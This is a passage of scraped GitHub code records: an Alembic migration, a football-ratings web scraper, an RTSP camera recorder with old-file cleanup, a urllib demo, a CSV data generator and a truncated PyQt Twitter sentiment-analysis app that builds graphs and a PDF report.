algorithms/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35177308923","text":"\"\"\"new\n\nRevision ID: d0a1b5442d0a\nRevises: d35842a8d058\nCreate Date: 2020-09-27 15:22:03.784426\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd0a1b5442d0a'\ndown_revision = 'd35842a8d058'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"movement_action\",\n sa.Column('movement_action_id', sa.Integer, primary_key=True),\n sa.Column('repetition', sa.Integer, nullable=False),\n sa.Column('weight', sa.Integer, nullable=False),\n sa.Column('date', sa.Date, nullable=False),\n sa.Column('movement_id', sa.Integer(), nullable=False),\n # sa.ForeignKeyConstraint(('movement_id',), ['movement.movement_id'], ),\n )\n op.create_foreign_key(\n 'fk_movement_action',\n 'movement_action', 'movement',\n ['movement_id'], ['movement_id'],\n )\n\n\ndef downgrade():\n op.drop_constraint('fk_movement_action', 'movement_action', type_='foreignkey')\n op.drop_table('movement_action')\n","repo_name":"soroushh/Flask_application_with_ec2_instance_docker","sub_path":"migrations/versions/d0a1b5442d0a_create_movement_action_table.py","file_name":"d0a1b5442d0a_create_movement_action_table.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30936521168","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\n\nall_data = dict()\nall_data[\"Premier League\"] = {\"clubs\": []}\nall_data[\"La Liga\"] = {\"clubs\": []}\nall_data[\"Bundesliga\"] = {\"clubs\": []}\n#all_data[\"clubs\"] = []\n\ndef get_data(tournament_name, team):\n url = f\"https://www.fifaratings.com/team/{team}\"\n r = requests.get(url)\n c = r.content\n soup = BeautifulSoup(c, \"html.parser\")\n main_table = soup.find(\"table\", {\"class\": \"table\"}).find(\"tbody\")\n all_players = main_table.find_all(\"tr\")\n ratings = []\n names = []\n positions = []\n\n for player in all_players:\n player_data = player.find_all(\"td\")\n if len(player_data) < 5:\n continue\n player_primary_data = player_data[1]\n # get the player's names\n player_name = player_primary_data.find(\"span\", {\"class\": \"entry-font\"})\n names.append(player_name)\n\n # get the player's positions\n player_position = player_primary_data.find(\"div\", {\"class\": \"text-nowrap\"}).find(\"a\").text\n player_position = filter_position(player_position.strip())\n positions.append(player_position)\n\n # get the player's ratings\n player_rating_tag = player.find_all(\"td\")[2]\n ratings.append(player_rating_tag)\n current_team = {}\n current_team[\"name\"] = filter_club_name(team)\n current_team[\"player_list\"] = []\n filtered_team_name = filter_club_name(team)\n for i in range(len(names)):\n current_team[\"player_list\"].append({\"name\": names[i].text, \"club\": filtered_team_name,\"age\":25, \"position\": positions[i].lower(), \"skill\": int(ratings[i].text)})\n\n all_data[tournament_name][\"clubs\"].append(current_team)\n\ndef filter_position(s):\n if s == \"CDM\" or s == \"CAM\":\n return s[1:]\n if s == \"ST\":\n return \"CF\"\n if s == \"LWB\":\n return \"LB\"\n if s == \"RWB\":\n return \"RB\"\n return s\n\ndef filter_club_name(club):\n new_name = \"\"\n for i in range(len(club)):\n if i == 0 or club[i-1] == \"-\":\n new_name += club[i].upper()\n elif club[i] == \"-\":\n new_name += \" \"\n else:\n new_name += club[i]\n return new_name\n\n\nepl_club_names = [\"manchester-city\", \"liverpool\", \"manchester-united\", \"chelsea\", \"tottenham-hotspur\", \"leicester-city\", \"arsenal\", \"west-ham-united\",\n \"everton\", \"wolverhampton-wanderers\", \"aston-villa\", \"leeds-united\", \"newcastle-united\", \"southampton\", \"burnley\", \"brighton-hove-albion\",\n \"watford\", \"norwich-city\", \"brentford\", \"crystal-palace\"\n ]\n\nla_liga_club_names = [\"real-madrid\", \"atletico-madrid\", \"fc-barcelona\", \"sevilla-fc\", \"villarreal-cf\", \"real-sociedad\", \"athletic-club-de-bilbao\",\n \"real-betis\", \"valencia-cf\", \"levante-ud\", \"granada-cf\", \"rc-celta\", \"ca-osasuna\", \"rcd-espanyol\", \"getafe-cf\",\n \"elche-cf\", \"rcd-mallorca\", \"cadiz-cf\", \"rayo-vallecano\", \"deportivo-alaves\"]\n\nbundesliga_club_names = [\"fc-bayern-munchen\", \"borussia-dortmund\", \"rb-leipzig\", \"borussia-monchengladbach\", \"vfl-wolfsburg\", \"bayer-04-leverkusen\",\n \"eintracht-frankfurt\", \"tsg-1899-hoffenheim\", \"hertha-bsc\", \"1-fc-union-berlin\", \"fc-augsburg\", \"sc-freiburg\", \"vfb-stuttgart\",\n \"1-fc-koln\", \"1-fsv-mainz-05\", \"dsc-arminia-bielefeld\", \"vfl-bochum-1848\", \"spvgg-greuther-furth\"]\n\nfor club in epl_club_names:\n get_data(\"Premier League\", club)\n\nfor club in la_liga_club_names:\n get_data(\"La Liga\", club)\n\nfor club in bundesliga_club_names:\n get_data(\"Bundesliga\", club)\n\nwith open(\"../database/all_team_data.json\", \"w\") as file:\n json.dump(all_data, file)\n","repo_name":"koryun23/football-manager","sub_path":"data_parsing/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5720116913","text":"import os\r\nimport cv2\r\nfrom datetime import datetime,timedelta\r\nimport imutils\r\nimport time\r\nfrom pathlib import Path\r\n#----TODO:----#\r\n#Cloud sync.\r\n\r\n#--RTSP SETTINGS--#\r\nrtspSource = 1 #0: Use parameters , 1: Use RTSP string \r\nrtspString = \"rtsp://demo:demo@192.168.1.100:5551/h264_ulaw.sdp\" #RTSP_String\r\nIP = \"192.168.1.100\" #RTSP Parameters\r\nPORT = \"5541\"\r\nEXTENTION = \"h264_ulaw.sdp\"\r\nUSER = \"demo\"\r\nPASS = \"demo\"\r\n\r\n#---RECORD SETTINGS---#\r\nrecordMin = 3 #record new video every x minutes ( min: 1 - max:59 )\r\nputTime = 1 #Put date and time on recorded video (0:No / 1:Yes)\r\nrecordWidth = 320 #only width available, height will set automaticly regarding to source\r\nshowImage = 0 #show live stream (0:No / 1:Yes)\r\nfpsVal = 30 #stream and record fps (max:30 - min:1)\r\nrestartTime = 3 #System will restart if any error occures! (minute)\r\nrecodDays = 5 #How many days will recorded. (depends on free space) [1min ~ 2mb] [7 days = 21GB]\r\ndeleteTime = \"04:00\" #everyday system will delete old records (recodDays) at this time\r\n\r\n#Internal settings. Don't change!\r\nlastMin = 0\r\nresDetected = 0\r\nrecordHeight = 0\r\nrecordCount = 0\r\nfunctionActive = 0\r\ndeleteHour = deleteTime.split(\":\")[0]\r\ndeleteMinute = deleteTime.split(\":\")[1]\r\nlastCleanDate = datetime(1923, 4, 23)\r\ncodec =cv2.VideoWriter_fourcc(*\"mp4v\")\r\n\r\ndef timeStamp():\r\n now = datetime.now()\r\n current_time = now.strftime(\"%d.%m.%Y %H:%M:%S\")\r\n return current_time\r\n\r\ndef frameName():\r\n now = datetime.now() \r\n f_name = now.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n frame_name = \"{}.mp4\".format(f_name)\r\n return frame_name\r\n\r\ndef appendLog(textVal):\r\n with open('LOG.txt', 'a') as fd:\r\n tm = timeStamp()\r\n fd.write(tm +\">\" + textVal + \"\\n\") \r\n\r\ndef cleanOldRecords(dayRange):\r\n print (\"Cleaning process started!\") #LOG this\r\n appendLog(\"Cleaning process started!\")\r\n thatDate = datetime.now().date() - timedelta(days = dayRange)\r\n for file in os.listdir():\r\n if file.endswith(\".mp4\"):\r\n file_name = file.split(\".\")[0]\r\n fileParams = file_name.split(\"_\")\r\n fileY = fileParams[0]\r\n fileM = fileParams[1]\r\n fileD = fileParams[2]\r\n if thatDate.year >= int(fileY) and thatDate.month >= int(fileM) and thatDate.day >= int(fileD):\r\n deleteStr = \"Deleted : {}\".format(file)\r\n Path.unlink(file) #unComment when it secure!!!\r\n print (deleteStr) #Log this\r\n appendLog(deleteStr)\r\n\r\ndef mainWorkload():\r\n logStr = \"Application started. Wait for RTSP connection and first settings!\"\r\n print (logStr)\r\n appendLog (logStr)\r\n\r\n global showImage\r\n global lastMin\r\n global resDetected\r\n global recordHeight\r\n global recordCount\r\n global restartTime\r\n global functionActive\r\n global deleteMinute\r\n global deleteHour\r\n global USER\r\n global PASS\r\n global IP\r\n global PORT\r\n global EXTENTION\r\n global fpsVal\r\n global rtspSource\r\n global rtspString\r\n global lastCleanDate\r\n global recodDays\r\n\r\n if rtspSource == 0:\r\n cap = cv2.VideoCapture(\"rtsp://{}:{}@{}:{}/{}\".format(USER,PASS,IP,PORT,EXTENTION))\r\n else:\r\n cap = cv2.VideoCapture(rtspString)\r\n cap.set(cv2.CAP_PROP_FPS, fpsVal)\r\n\r\n restartTimeSec = restartTime * 60\r\n lastRecorded = \"0000_00_00_00_00_00.mp4\"\r\n c = 0\r\n functionActive = 1\r\n \r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if resDetected == 0:\r\n width = cap.get(3)\r\n height = cap.get(4)\r\n resRate = width / recordWidth\r\n recordHeight = height / resRate\r\n recordHeight = int(recordHeight)\r\n print (\"Record resolution set as {}x{}\".format(recordWidth, recordHeight))\r\n resDetected = 1\r\n \r\n if recordCount == 0: #first record\r\n n = datetime.now()\r\n firstName = \"{}_{}_{}_{}_{}_{}.mp4\".format(n.year,n.month,n.day,n.hour,n.minute,n.second)\r\n out = cv2.VideoWriter(firstName ,codec, fpsVal, (recordWidth, recordHeight))\r\n recordCount = 1\r\n print (\"First record configured and recording started!\")\r\n \r\n try: \r\n frame = imutils.resize(frame, width=recordWidth) \r\n except:\r\n print (\"Error occurred while image processing. Server might be closed! Checking!\")\r\n time.sleep (2) #wait before check!\r\n if cap.isOpened() == False:\r\n logStr = \"RTSP Server seems closed! Check the RTSP server! System restart in {} min!\".format(restartTime)\r\n appendLog(logStr)\r\n print (logStr) \r\n functionActive = 0\r\n resDetected = 0\r\n recordCount = 0\r\n out.release()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n time.sleep(restartTimeSec)\r\n return\r\n else:\r\n logStr = \"RTSP Server seems open! Another unidentified error!! System restart in {} min!\".format(restartTime)\r\n appendLog(logStr)\r\n print (logStr)\r\n functionActive = 0\r\n resDetected = 0\r\n recordCount = 0\r\n out.release()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n time.sleep(restartTimeSec)\r\n break\r\n \r\n if putTime == 1:\r\n timeText = timeStamp()\r\n cv2.putText(img=frame, text=timeText, org=(0, 15), fontFace=cv2.FONT_HERSHEY_PLAIN, fontScale=1, color=(0, 0, 255),thickness=0)\r\n\r\n controlTime = datetime.now()\r\n\r\n if lastCleanDate!=controlTime.date() and str(controlTime.hour) == str(deleteHour) and str(controlTime.minute) == str(deleteMinute):\r\n lastCleanDate = controlTime.date()\r\n cleanOldRecords(recodDays)\r\n \r\n \r\n schTime = controlTime.minute\r\n \r\n if schTime != lastMin and (schTime % recordMin) == 0 :\r\n out.release()\r\n lastMin = schTime\r\n file_name = frameName()\r\n out = cv2.VideoWriter(file_name ,codec, fpsVal, (recordWidth, recordHeight))\r\n logStr = \"LOG : {} saved. {} started to record. Total frame : {}\".format(lastRecorded,file_name,c)\r\n c= 0\r\n print (logStr)\r\n appendLog(logStr)\r\n lastRecorded = file_name\r\n out.write(frame)\r\n c = c+1\r\n \r\n if showImage == 1:\r\n cv2.imshow('TestView', frame)\r\n \r\n if cv2.waitKey(20) & 0xFF == ord('q'):\r\n logStr = \"Video screen closed. Application will restart without screen and continue to record!\"\r\n print (logStr)\r\n appendLog(logStr)\r\n out.release()\r\n showImage = 0\r\n functionActive = 0\r\n resDetected = 0\r\n recordCount = 0\r\n out.release()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n break\r\n \r\nwhile True:\r\n if functionActive == 0:\r\n mainWorkload()\r\n","repo_name":"ernecati/rtspRecordER","sub_path":"rtspRecorder.py","file_name":"rtspRecorder.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73676378409","text":"from urllib.request import urlopen,urlretrieve\nfrom urllib.parse import urlencode,parse_qs\n\n# python3中包含request,error,parse和robotparser4个模块\n# res = urlopen(\"http://www.baidu.com\")\n# print(res.read().decode('utf-8'))\n\n# retrieve可以直接将网页下载到本地\n# urlretrieve('http://www.baidu.com','baidu.html') \n\n# urlencode对特殊字符进行编码\ndata = {'name': '刘德华','value': '123'}\nqs = urlencode(data)\nprint(qs)\n\n# parse_qs对编码之后的进行解码\nqs2 = parse_qs(qs)\nprint(qs2)\n","repo_name":"wangquan1024/webSpider","sub_path":"urilib/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"628651586","text":"import csv\nimport random\n\nitem_file=open('items.csv')\nitems=item_file.readlines()\nnum_items=len(items)-1\nitem_file.close()\n\ndish_file=open('dishes.csv')\ndishes=dish_file.readlines()\nnum_dishes=len(dishes)-1\ndish_file.close()\n\nmax_item_per_dish=min(10,num_items)\nmax_amount_item=10\n\ndish_item_file=open('dish_items.csv','w')\ndish_item_file.write('dish_id,item_id,quantity\\n')\n\nD=range(1,num_dishes+1)\nI=range(1,num_items+1)\nfor i in D:\n k=random.randint(1,max_item_per_dish)\n dish_i_items=random.sample(I,k)\n for i_item in dish_i_items:\n quan=random.randint(1,max_amount_item)\n dish_item_file.write(str(i)+','+str(i_item)+','+str(quan)+'\\n')\n\ndish_item_file.close()","repo_name":"Akash-116/CS387-Project","sub_path":"Phase2-Project Design document/data/gen_dish_items.py","file_name":"gen_dish_items.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69798279850","text":"import numpy as np\nfrom wordcloud import WordCloud\nimport re\nfrom matplotlib import pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom nltk.tokenize import TweetTokenizer, RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom stop_words import get_stop_words\nimport nltk\nfrom collections import Counter\nfrom os import path\nfrom fpdf import FPDF\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT as NavigationToolbar\nfrom twit import *\nfrom interface_ui import Ui_MainWindow\nfrom PySide6.QtGui import QPixmap, QImage\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QVBoxLayout, QWidget, QLabel\nfrom PySide6.QtCore import Qt, QSize, QPropertyAnimation, QIODevice, QUrl, QFile, QTextStream\nfrom PySide6.QtWebEngineCore import QWebEngineSettings\nfrom PySide6.QtWebEngineWidgets import QWebEngineView\nimport sys\nimport tweepy\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib\nmatplotlib.use('Qt5Agg')\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n \"\"\"\n Initializes the user interface calling setupUi method from interface_ui.py\n \"\"\"\n\n def __init__(self, app):\n super().__init__()\n self.setupUi(self)\n self.app = app\n\n \"\"\"\n Connect the event methods to the buttons\n \"\"\"\n self.homeBtn.clicked.connect(self.clickedHomeBtn)\n self.dataBtn.clicked.connect(self.clickedDataBtn)\n self.reportBtn.clicked.connect(self.clickedReportBtn)\n self.menuBtn.clicked.connect(self.menuClicked)\n self.infoBtn.clicked.connect(self.clickedInfoBtn)\n self.helpBtn.clicked.connect(self.clickedHelpBtn)\n self.minimizeWinBtn.clicked.connect(self.minimize)\n self.restoreWinBtn.clicked.connect(self.maximize)\n self.pushButton.clicked.connect(self.closeCenterMenu)\n self.closeWinBtn.clicked.connect(self.closeApp)\n self.searchBtn.clicked.connect(self.clickedSearchBtn)\n\n \"\"\"\n Create Canvas for Graphs\n \"\"\"\n self.canvas = FigureCanvas(Figure())\n self.ax = self.canvas.figure.add_subplot(111)\n self.toolbar = NavigationToolbar(self.canvas, self)\n\n self.container1 = QWidget()\n self.lay = QVBoxLayout(self.container1)\n self.lay.addWidget(self.canvas)\n self.lay.addWidget(self.toolbar)\n\n # Add widget to scroll layout\n self.scroll_layout.addWidget(self.container1)\n self.container1.setMinimumWidth(400)\n self.container1.setMinimumHeight(400)\n\n \"\"\"\n self.canvas2 = FigureCanvas(Figure())\n self.ax2 = self.canvas2.figure.add_subplot(111)\n self.toolbar2 = NavigationToolbar(self.canvas2, self)\n \"\"\"\n\n self.container2 = QWidget()\n self.lay = QVBoxLayout(self.container2)\n self.l1 = QLabel(self.container2)\n self.l1.setMinimumWidth(1000)\n self.l1.setMinimumHeight(800)\n\n # Add second widget to scroll layout\n self.scroll_layout.addWidget(self.container2)\n self.container2.setMinimumWidth(1000)\n self.container2.setMinimumHeight(800)\n\n \"\"\"\n self.lay.addWidget(self.canvas2)\n self.lay.addWidget(self.toolbar2)\n \"\"\"\n self.container3 = QWidget()\n self.lay = QVBoxLayout(self.container3)\n self.label = QLabel(self.container3)\n self.label.setMinimumWidth(800)\n self.label.setMinimumHeight(400)\n\n # Add third widget to scroll layout\n self.scroll_layout.addWidget(self.container3)\n self.container3.setMinimumWidth(800)\n self.container3.setMinimumHeight(400)\n\n self.container4 = QWidget()\n self.lay = QVBoxLayout(self.container4)\n self.l2 = QLabel(self.container4)\n self.l2.setMinimumWidth(1000)\n self.l2.setMinimumHeight(800)\n\n self.scroll_layout.addWidget(self.container4)\n self.container4.setMinimumWidth(1000)\n self.container4.setMinimumHeight(800)\n\n self.container5 = QWidget()\n self.lay = QVBoxLayout(self.container5)\n self.l3 = QLabel(self.container5)\n self.l3.setMinimumWidth(1000)\n self.l3.setMinimumHeight(600)\n\n # Add widget to scroll layout\n self.scroll_layout.addWidget(self.container5)\n self.container5.setMinimumWidth(1000)\n self.container5.setMinimumHeight(800)\n\n \"\"\"\n self.canvas3 = FigureCanvas(Figure())\n self.ax3 = self.canvas3.figure.add_subplot(111)\n self.toolbar3 = NavigationToolbar(self.canvas3, self)\n self.container4 = QWidget()\n self.lay4 = QVBoxLayout(self.container4)\n self.lay4.addWidget(self.canvas3)\n self.lay4.addWidget(self.toolbar3)\n \"\"\"\n \"\"\"\n self.scroll_layout.addWidget(self.container4)\n self.container4.setMinimumWidth(400)\n self.container4.setMinimumHeight(400)\n \"\"\"\n \"\"\" self.container.setMinimumWidth(800)\n self.container3.setMinimumHeight(400) \"\"\"\n\n \"\"\"\n Creates WebView for PDF\n \"\"\"\n self.webView = QWebEngineView()\n self.webView.settings().setAttribute(\n QWebEngineSettings.WebAttribute.PluginsEnabled, True)\n self.webView.settings().setAttribute(\n QWebEngineSettings.WebAttribute.PdfViewerEnabled, True)\n self.verticalLayout_13.addWidget(self.webView)\n self.webView.setMinimumHeight(600)\n\n # Button action logic\n\n # Changes the StackWidget to page 4 for home page\n\n def clickedHomeBtn(self):\n self.stackedWidget_2.setCurrentWidget(self.page_4)\n self.leftMenuContainer.setMaximumWidth(50)\n\n # Changes Stacked Widget to page 3 where user can enter search topic\n\n def clickedDataBtn(self):\n self.stackedWidget_2.setCurrentWidget(self.page_3)\n self.leftMenuContainer.setMaximumWidth(50)\n\n # Changes Stacked Widget to page 5 which is where WebView is already there for pdf view\n def clickedReportBtn(self):\n self.stackedWidget_2.setCurrentWidget(self.page_5)\n self.leftMenuContainer.setMaximumWidth(50)\n topic = self.lineEdit.text()\n\n # --------------------- Creates pdf file ---------------------------\n file = open(\"text.txt\", \"r\")\n text = file.read()\n file.close()\n\n pdf = FPDF('P', 'mm', 'Letter')\n\n # Add a page\n pdf.add_page()\n\n pdf.set_margins(10, 10, 10)\n\n # specify font\n # fonts ('times', 'courier', 'helvetica', 'symbol', 'zpfdingbats')\n # 'B' (bold), 'U' (underline), 'I' (italics), '' (regular), combination (i.e., ('BU'))\n\n pdf.set_font('helvetica', 'BU', size=16)\n\n pdf.cell(w=0, h=0, txt='Sentimental Anaylsis Report', align='C')\n\n pdf.ln(h=10)\n # Line Breaks are required inbetween new cells, multicells and images!\n\n pdf.set_font('helvetica', size=12)\n\n pdf.multi_cell(0, 10, text, align='J')\n\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 1:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('first.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: Figure 1 represents a bar graph containing the overall score for ' + str(topic) +\n '. The red bar is the total score weighted while the blue and orange represent the polarity and subjectivity score. The higher the total score is the more positive the sentiment for the selected topic', align='J')\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 2:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('bar.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This is a graph that shows the top 10 most frequently reoccuring words found in the tweets.'\n + \"Tokenization was used to count the number of times each word appeared and the result for the top 10 were aggregated into this chart.\", align='J')\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 3:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('scatter.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This graph is a scatter plot of all the tweets obtained via the Twitter API for a given topic. This graph you can see the relationship between polarity and subjectivity. If the point is darker that mean there are more than one tweet that generated the same score. .', align='J')\n\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 4:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('wordcloud.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This graph shows wordcloud for the selected topic. The more a specific word appear in the data, the bigger and bolder it will appear in the word cloud and the more important it is. This word cloud was generated using a maximum of 5000 words. ', align='J')\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 5:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('adjectives.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This graph shows the most frequent adjectives used in the tweets. Since these are descriptive words, they can really affect the overall score of the topic. Having more positive adjectives can really change the overall test results produced in the graphs. ', align='J')\n\n pdf.output(\"pdftest.pdf\")\n\n # Sets webview to url leading to desktop directory where pdf was saved\n if len(sys.argv) > 1:\n self.webView.setUrl(QUrl(f\"{sys.argv[1]}\"))\n else:\n wd = wd = path.dirname(path.abspath(sys.argv[0]))\n test_pdf = \"pdftest.pdf\"\n self.webView.setUrl(QUrl(f\"file://{wd}/{test_pdf}\"))\n\n # Displays Menu\n def menuClicked(self):\n w = self.leftMenuContainer.width()\n maxExtend = 16777215\n standard = 50\n if w == 50:\n self.leftMenuContainer.setMaximumWidth(maxExtend)\n else:\n self.leftMenuContainer.setMaximumWidth(standard)\n\n # Displayes Info Tab\n def clickedInfoBtn(self):\n self.stackedWidget.setCurrentWidget(self.page)\n self.centerMenuSubContainer.setMinimumWidth(200)\n self.centerMenuContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMaximumWidth(200)\n self.leftMenuContainer.setMaximumWidth(50)\n self.label_2.setText(\"To begin:\\nEnter a topic you would like\\nto explore in the search\\nbar. After clicking the \\nbutton the program will \\nget tweets from Twitter\\nThat contains the\\nSubject you have entered\\nBased on those results\\nThe program will generate\\nThe graphs that will tell\\nYou the sentiment of the\\nTopic you have entered. \\nThe higher the total score the\\nMore positive the tweets are\\nThe graphs will also present\\nFrequently used words that\\nGive users more information \\nAbout the topic.\")\n\n # Displayes Help Tab\n\n def clickedHelpBtn(self):\n self.stackedWidget.setCurrentWidget(self.page_2)\n self.centerMenuSubContainer.setMinimumWidth(200)\n self.centerMenuContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMaximumWidth(200)\n self.leftMenuContainer.setMaximumWidth(50)\n self.label_3.setText(\"For more help:\\nFAQ:\\nWhere can I find documentation?\\nVisit QT Documentation\\nHow does the app work?\\nSee Information\\n\\n What is Polarity?\\nPolarity ranges from -1 to 1.\\nIt refers to negative and\\nPositive sentiment\\n\\nWhat is Subjectivity?\\nSubjectivity ranges from 0 to 1.\\nIt refers to personal opinions\\nand judgments.\\n\")\n\n def minimize(self):\n self.showMinimized()\n\n def maximize(self):\n self.showMaximized()\n\n def closeApp(self):\n sys.exit()\n\n def closeCenterMenu(self):\n self.centerMenuSubContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMaximumWidth(0)\n\n # Logic to run API call to Twitter and get Tweet scores\n def clickedSearchBtn(self):\n tweets = self.getTweets()\n t = []\n tweetObj = []\n for tweet in tweets:\n t.append([tweet.full_text])\n\n for text in t:\n tweetObj.append(TweetObject(str(text)))\n\n topic = TopicObject(tweetObj)\n polarity = topic.getPolarity(tweetObj)\n subjectivity = topic.getSubjectivity(tweetObj)\n total = topic.getScore(polarity, subjectivity)\n self.label_9.setText(\"The Polarity score is: \" + str(polarity))\n self.label_10.setText(\n \"The Subjectivity score is: \" + str(subjectivity))\n\n data = {\n \"total\": total,\n \"polarity\": polarity,\n \"subjectivity\": subjectivity\n }\n\n self.getFirstGraph(data)\n\n tokenizer = TweetTokenizer()\n tweet_tokens = [tokenizer.tokenize(str(tweet)) for tweet in t]\n\n stop_words = ['RT', 'contact', '\\\"\\\"', 've',\n 's', 't', '*', '\\'', '...', '\\\"', ' ']\n # extract the adjectives\n adjectives = []\n adjectives.clear()\n for tokens in tweet_tokens:\n pos_tags = nltk.pos_tag(tokens)\n for word, pos in pos_tags:\n if pos == 'JJ' and word not in stop_words:\n adjectives.append(word)\n # print(adjectives)\n\n # create a list of unique adjectives and their frequency\n unique_adj = list(set(adjectives))\n adj_count = [adjectives.count(adj) for adj in unique_adj]\n\n current = []\n # sort the adjectives by frequency in descending order and select the top 10\n sorted_adj = [adj for adj, count in Counter(\n adjectives).most_common(15)]\n sorted_count = [count for adj, count in Counter(\n adjectives).most_common(15)]\n\n result = self.filter(t)\n self.wc(result, 'black', 'Frequent Words')\n\n self.getThirdGraph(result)\n\n x = topic.listPolarity(tweetObj)\n y = topic.listSubjectivity(tweetObj)\n self.getFourthGraph(x, y)\n self.getSecondGraph(sorted_adj, sorted_count)\n\n # Calls the Twitter API\n\n def getTweets(self):\n searchQuery = self.lineEdit.text()\n api = tweepy.API(auth)\n tweets = api.search_tweets(\n q=searchQuery, lang='en', result_type='recent', count=100, tweet_mode='extended')\n return (tweets)\n\n # Generates bar graph of total, subjectivity, and polarity\n # You pass in data dictionary as scores\n def getFirstGraph(self, scores):\n titles = list(scores.keys())\n values = list(scores.values())\n\n bar_labels = ['red', 'blue', 'orange']\n bar_colors = ['tab:red', 'tab:blue', 'tab:orange']\n\n self.ax.bar(titles, values, width=0.4,\n label=bar_labels, color=bar_colors)\n self.ax.set_ylabel(\"Scoress\")\n self.canvas.draw()\n self.canvas.print_figure(\"first.png\")\n\n # Generates word frequency graph\n\n def getSecondGraph(self, adj, count):\n fig, ax = plt.subplots(figsize=(7, 5.5))\n fig.set_size_inches(10, 5)\n plt.bar(adj, count, width=0.7, align='edge')\n plt.xlabel('Adjectives')\n plt.ylabel('Frequency')\n plt.title('Frequency of Adjectives in Tweets')\n plt.xticks(rotation=20)\n plt.savefig(\"adjectives.png\")\n self.l3.setPixmap(QPixmap(QImage(\"adjectives.png\")))\n self.l3.setScaledContents(True)\n\n # Generates the wordcloud\n\n def wc(self, data, bgcolor, title):\n wc = WordCloud(background_color=bgcolor,\n max_words=5000, max_font_size=50)\n gwc = wc.generate(' '.join(data))\n image = gwc.to_image()\n image.save(\"wordcloud.png\")\n self.label.setPixmap(QPixmap(QImage(\"wordcloud.png\")))\n self.label.setScaledContents(True)\n\n # Filters and cleans text\n\n def filter(self, t):\n # convert list into text\n list_to_text = ''.join(str(t))\n\n # removes punctuation,numbers and returns list of words\n desc_remove_pun = re.sub('[^A-Za-z]+', ' ', list_to_text)\n\n # remove all the stopwords from the text\n stop_words = list(get_stop_words('en'))\n nltk_words = list(stopwords.words('english'))\n stop_words.extend(nltk_words)\n\n word_tokens = nltk.tokenize.word_tokenize(desc_remove_pun)\n filtered_sentence_desc = [\n w_desc for w_desc in word_tokens if not w_desc in 